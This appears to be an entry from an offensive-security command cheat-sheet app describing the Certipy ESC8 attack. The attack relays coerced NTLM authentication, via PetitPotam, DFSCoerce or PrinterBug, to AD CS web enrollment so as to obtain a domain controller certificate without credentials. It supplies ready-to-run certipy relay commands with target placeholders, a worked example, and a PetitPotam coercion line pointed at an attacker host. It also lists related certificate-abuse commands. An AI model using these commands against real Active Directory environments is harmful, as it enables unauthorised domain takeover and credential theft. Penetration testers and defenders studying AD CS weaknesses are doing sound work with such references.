Certipy ESC8 (HTTP Web Enrollment Relay)
ESC8: AD CS Web Enrollment endpoint accepts NTLM and is missing EPA. Relay coerced machine authentication (PetitPotam, DFSCoerce, PrinterBug) to /certsrv to enroll a cert as the victim — typically a DC machine account, yielding a TGT-capable certificate.
- Tool
- certipy
- Category
- Credential Attacks / ADCS (Certificate Abuse)
- Platform
- linux
- Requires
- no credentials
- Protocols
- HTTP, NTLM
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
certipy relay -target 'http://<ca-fqdn>' -template '<template>'
Credential variants
The same attack using a different authentication material.
Default DomainController template requires no credentials
certipy relay -target 'http://<ca-fqdn>' -template DomainController
Examples
certipy relay -target 'http://ca.corp.local' -template DomainController
# In another terminal: coerce auth from DC to your relay host
python3 PetitPotam.py <attacker-ip> <dc-ip>
Tags
References
Related commands
- bloodyAD Shadow Credentials Add a Key Credential (msDS-KeyCredentialLink) to a target object you have GenericWrite…
- Certipy Account Operations Create, update, read, or delete user / computer accounts directly through Certipy.…
- Certipy Authenticate with Certificate Authenticate using a PFX certificate to obtain a TGT and NT hash
- Certipy CA Management Enumerate and manipulate the certificate authority itself: list officers (ESC7), backup…
- Certipy ESC1 (Subject in Request) Exploit ESC1: a template that allows the requester to specify a Subject Alternative Name…
- Certipy ESC11 (RPC Relay to ICPR) ESC11: ICertPassage RPC interface accepts NTLM without IF_ENFORCEENCRYPTICERTREQUEST.…
- Certipy ESC13 (OID Group Link) ESC13: a template's issuance policy is linked to a privileged group via…
- Certipy ESC14 (altSecurityIdentities Mapping) ESC14: weak explicit certificate mapping via altSecurityIdentities. With write access…